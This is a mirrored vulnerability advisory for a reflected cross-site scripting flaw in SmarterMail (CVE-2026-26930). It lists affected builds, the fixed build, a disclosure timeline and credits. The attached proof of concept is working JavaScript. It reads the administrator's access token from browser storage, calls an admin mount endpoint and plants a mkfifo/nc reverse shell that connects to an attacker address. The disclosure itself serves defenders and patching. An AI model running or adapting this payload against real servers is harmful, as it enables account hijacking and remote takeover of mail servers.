Share
## https://sploitus.com/exploit?id=PACKETSTORM:215790
----------------------------------------------------------------------------
    SmarterMail <= 9518 (MailboxId) Reflected Cross-Site Scripting Vulnerability
    ----------------------------------------------------------------------------
    
    
    [-] Software Link:
    
    https://www.smartertools.com/smartermail/business-email-server
    
    
    [-] Affected Versions:
    
    Build 9518 and prior builds.
    
    
    [-] Vulnerability Description:
    
    User input passed through the "MailboxId" GET parameter to the MAPI
    endpoints is not properly sanitized before being used to generate HTML
    output. This can be exploited by attackers to perform Reflected Cross-Site
    Scripting (XSS) attacks which, in turn, might lead to 1-click Remote
    Command Execution (RCE) attacks.
    
    
    [-] Proof of Concept:
    
    https://karmainsecurity.com/pocs/CVE-2026-26930.html
    
    
    [-] Solution:
    
    Upgrade to build 9526 or later.
    
    
    [-] Disclosure Timeline:
    
    [26/01/2026] - Vendor notified
    
    [26/01/2026] - Vendor response stating "we will get this over to the
    developers for evaluation"
    
    [30/01/2026] - Vendor released build 9526
    
    [03/02/2026] - CVE identifier requested
    
    [16/02/2026] - CVE identifier assigned
    
    [16/02/2026] - Public disclosure
    
    
    [-] CVE Reference:
    
    The Common Vulnerabilities and Exposures project (cve.org) has assigned the
    name CVE-2026-26930 to this vulnerability.
    
    
    [-] Credits:
    
    Vulnerability discovered by Egidio Romano.
    
    
    [-] Original Advisory:
    
    https://karmainsecurity.com/KIS-2026-04
    
    
    --- packet storm attached poc: ---
    
    <!--
        ----------------------------------------------------------------------------
        SmarterMail <= 9518 (MailboxId) Reflected Cross-Site Scripting Vulnerability
        ----------------------------------------------------------------------------
        
        author..............: Egidio Romano aka EgiX
        mail................: n0b0d13s[at]gmail[dot]com
        software link.......: https://www.smartertools.com/smartermail/business-email-server
        
        +-------------------------------------------------------------------------+
        | This proof of concept code was written for educational purpose only.    |
        | Use it at your own risk. Author will be not responsible for any damage. |
        +-------------------------------------------------------------------------+
        
        [-] Original Advisory:
    
        https://karmainsecurity.com/KIS-2026-04
    -->
    <script>
    
     const VICTIM_URL = "http://smartermail";
     
     const XSS = `<script>
       const ATTACKER_IP = "192.168.1.23";
       const ATTACKER_PORT = "4444";
       
       fetch("` + VICTIM_URL + `/api/v1/settings/sysadmin/AddOrUpdateMount", {
          method: "POST",
          headers: {
          	"Content-Type": "application/json",
          	"Authorization": "Bearer " + Object.values(JSON.parse(localStorage.userTokens))[0].accessToken
          },
          body: JSON.stringify({
             CommandMount: "rm /tmp/f; mkfifo /tmp/f; cat /tmp/f | /bin/sh -i 2>&1 | nc " + ATTACKER_IP + " " + ATTACKER_PORT + " > /tmp/f",
             MountPath: "RCE"
          })
       });
     <\/script>`;
     
     location.href = VICTIM_URL + "/mapi/nspi?MailboxId=" + encodeURIComponent(btoa(XSS));
     
    </script>